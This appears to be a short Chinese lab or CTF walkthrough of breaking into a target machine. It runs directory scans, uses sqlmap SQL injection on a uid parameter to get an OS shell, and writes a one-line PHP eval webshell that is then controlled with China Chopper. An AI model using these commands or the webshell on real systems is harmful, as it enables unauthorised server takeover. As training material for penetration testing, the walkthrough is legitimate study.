首先使用Goby扫描靶机IP
得到地址后使用dirsearch扫描目录
得出/robots.txt ,然后进行访问
接下来尝试访问目录 /m3diNf0/ 不能正常访问
/se3reTdir777/得出页面
使用dirb对/m3diNf0/目录进行扫描 会找到一个info.php文件 我们在网站上打开,得到网站的绝对路径
继续使用dirb对/se3reTdir777目录进行扫描,找到一个index.php文件,访问
使用抓包工具进行抓包,并在uid=1后面加上 * 然后复制到一个txt文件里面,这里我的是创建的1.txt文件
我们接下来就需要用工具sqlmap进行注入了
我们可以选择在本机也就是物理机上下载sqlmap,然后再进行注入
也可以选择使用虚拟机 kali 进行注入
因为虚拟机 kali 自带sqlmap,不需要下载 ,所以这里我选择的kali 虚拟机进行注入
sqlmap -r 1.txt
尝试--os-shell 这里需要绝对路径,我们之前已经找到绝对路径所以可以直接尝试连接--os-shell
然后写入php木马文件
echo '<?php @eval($_POST[cmd]);?>' >> /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/1.php
写入后我们就可以使用菜刀进行连接了